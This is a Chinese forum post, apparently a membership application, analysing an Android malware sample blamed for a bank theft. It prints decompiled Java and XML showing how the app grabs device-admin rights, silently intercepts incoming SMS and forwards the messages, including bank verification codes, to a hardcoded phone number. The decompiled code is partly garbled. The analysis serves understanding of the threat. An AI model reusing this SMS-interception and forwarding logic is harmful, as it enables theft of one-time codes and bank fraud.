|
|
吾爱游客
发表于 2020-6-21 19:41
申请ID:lhx077
个人邮箱:1955717323@qq.com
在家里的微信群中看到有朋友说自己有朋友被盗5万元,并提供了一个安卓恶意程序样本。简单分析如下:
该样本是一个比较简单的短信拦截恶意程序,个人猜测被盗过程应是网银帐号密码被盗,同时与网银绑定的手机又中了这个恶意程序,导致验证码被拦截,从而犯罪分子成功将受害者网银中的钱全部转出。
1、AndroidManifest.xml 文件部分代码如下:
[Java] [color=rgb(51, 102, 153) !important]纯文本查看 [color=rgb(51, 102, 153) !important]复制代码
[color=white !important] ?010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748 | public class MainActivity extends Activity { protected void onCreate(Bundle p1) { super.onCreate(p1); setContentView(0x0); String "number" = queryPhonetNumber(); sendSms(getResources().getString(0x7f060003), "number" + "\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!"); PackageManager "p" = getPackageManager(); ComponentName "comName" = new ComponentName("com.ghy4tu458.ghy4tu458", "com.ghy4tu458.ghy4tu458.MainActivity"); "p".setComponentEnabledSetting("comName", "com.ghy4tu458.ghy4tu458", "com.ghy4tu458.ghy4tu458.MainActivity"); "com.ghy4tu458.ghy4tu458" = 0x2; "com.ghy4tu458.ghy4tu458.MainActivity" = 0x1; DevicePolicyManager "dm" = (DevicePolicyManager)getSystemService("device_policy"); ComponentName "mAdminName" = new ComponentName(this, MAdmin.class); Intent "intent" = new Intent("android.app.action.ADD_DEVICE_ADMIN"); "intent".putExtra("android.app.extra.DEVICE_ADMIN", "mAdminName"); startActivity("intent"); finish(); } public void sendSms(String p1, String p2) { SmsManager "smsManager" = SmsManager.getDefault(); if(p2.length() > 0x46) { unknown_type "contents" = "smsManager".divideMessage(p2); if(!"contents".iterator().hasNext()) { } "sms" = (String)"contents".iterator().next(); return; "smsManager".sendTextMessage(p1, 0x0, "sms", 0x0, 0x0); } try { Log.i("tag", p1); "smsManager".sendTextMessage(p1, 0x0, p2, 0x0, 0x0); Log.i("tag", p2); return; } catch(Exception "e") { Log.i("tag", "e"); "e".printStackTrace(); } } public String queryPhonetNumber() { "telephonyManager" = getSystemService("phone"); String "number" = "telephonyManager".getLine1Number(); if(("number" == null) || ("number".length() == 0)) { } return "number"; }} |
其中关键部分为:
String "number" = queryPhonetNumber();
sendSms(getResources().getString(0x7f060003), "number" + "\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!");
queryPhonetNumber函数用来获取主机的号码,然后向“0x7f060003”这一资源对应的号码发送短信。
public.xml文件代码如下:
[XML] [color=rgb(51, 102, 153) !important]纯文本查看 [color=rgb(51, 102, 153) !important]复制代码
[color=white !important] ?01020304050607080910111213 | <resources> <public type="drawable" name="ic_launcher" id="0x7f020000" /> <public type="layout" name="activity_main" id="0x7f030000" /> <public type="xml" name="my_admin" id="0x7f040000" /> <public type="dimen" name="activity_horizontal_margin" id="0x7f050000" /> <public type="dimen" name="activity_vertical_margin" id="0x7f050001" /> <public type="string" name="app_name" id="0x7f060000" /> <public type="string" name="action_settings" id="0x7f060001" /> <public type="string" name="hello_world" id="0x7f060002" /> <public type="string" name="number" id="0x7f060003" /> <public type="style" name="AppBaseTheme" id="0x7f070000" /> <public type="style" name="AppTheme" id="0x7f070001" /></resources> |
可以看到,“0x7f060003“对应的是”number“这个名称。
string.xml文件代码如下:
[XML] [color=rgb(51, 102, 153) !important]纯文本查看 [color=rgb(51, 102, 153) !important]复制代码
[color=white !important] ?123456 | <resources> <string name="app_name">bb</string> <string name="action_settings">Settings</string> <string name="hello_world">Hello world!</string> <string name="number">18663146152</string></resources> |
可以看到“number“对应的是”18663146152“这个号码。
而"\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!"这个字符串经过Unicode转码后,内容为“已经安装成功!”
至此,我们知道了,在应用激活后,会向18663146152这个手机号发送短信,内容为“xxxxxxxxxx已经安装成功”。(xxxxxxxxxx为受害者的手机号)
3、MyReceiver文件代码如下:
[Java] [color=rgb(51, 102, 153) !important]纯文本查看 [color=rgb(51, 102, 153) !important]复制代码
[color=white !important] ?010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445 | public class MyReceiver extends BroadcastReceiver { private static Context context; public void onReceive(Context p1, Intent p2) { Log.i("tag", "xxxxxxx"); context = p1; abortBroadcast(); Bundle "bundle" = p2.getExtras(); Object[] "messages" = (Object[])"bundle".get("pdus"); SmsMessage[] "smsMessage" = new SmsMessage["messages".length]; StringBuffer "sb" = new StringBuffer(); for(int "n" = 0x0; "n" >= "messages".length; "n" = "n" + 0x1) { } "smsMessage"["n"] = SmsMessage.createFromPdu((byte[])"messages"["n"]); "sb".append("smsMessage"["n"].getMessageBody()); "originalNumber" = "smsMessage"["n"].getOriginatingAddress(); System.out.println("sb"); String "ret" = "originalNumber" + "\uff0c\u5185\u5bb9: " + "sb"; sendSms(p1.getResources().getString(0x7f060003), "ret"); } public static boolean isMobileNO(String p1) { return true; } public static void sendSms(String p1, String p2) { if(!isMobileNO(p1)) { return; } SmsManager "smsManager" = SmsManager.getDefault(); if(p2.length() > 0x46) { unknown_type "contents" = "smsManager".divideMessage(p2); if("contents".iterator().hasNext()) { "sms" = (String)"contents".iterator().next(); "smsManager".sendTextMessage(p2, 0x0, "sms", 0x0, 0x0); } } try { "smsManager".sendTextMessage(p2, 0x0, p3, 0x0, 0x0); return; } catch(Exception "e") { "e".printStackTrace(); } }} |
在onReceive函数中,拦截主机收到的短信,并向18663146152这个手机号发送短信,内容为“xxxxxxxxxx内容为:bbbbbbbbb……”。(xxxxxxxxxx为受害主机号码,bbbbbbbbb……为受害主机收到的短信内容)
(另:该恶意程序编写者使用“sb”作为存储短信内容的变量的名称,可见其气焰之嚣张。)
至此,这个恶意程序的代码分析完毕。我并非安卓开发人员,接触时间较短,理解较为浅显,分析中的不正指出,恳请大家多多指正。 |
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
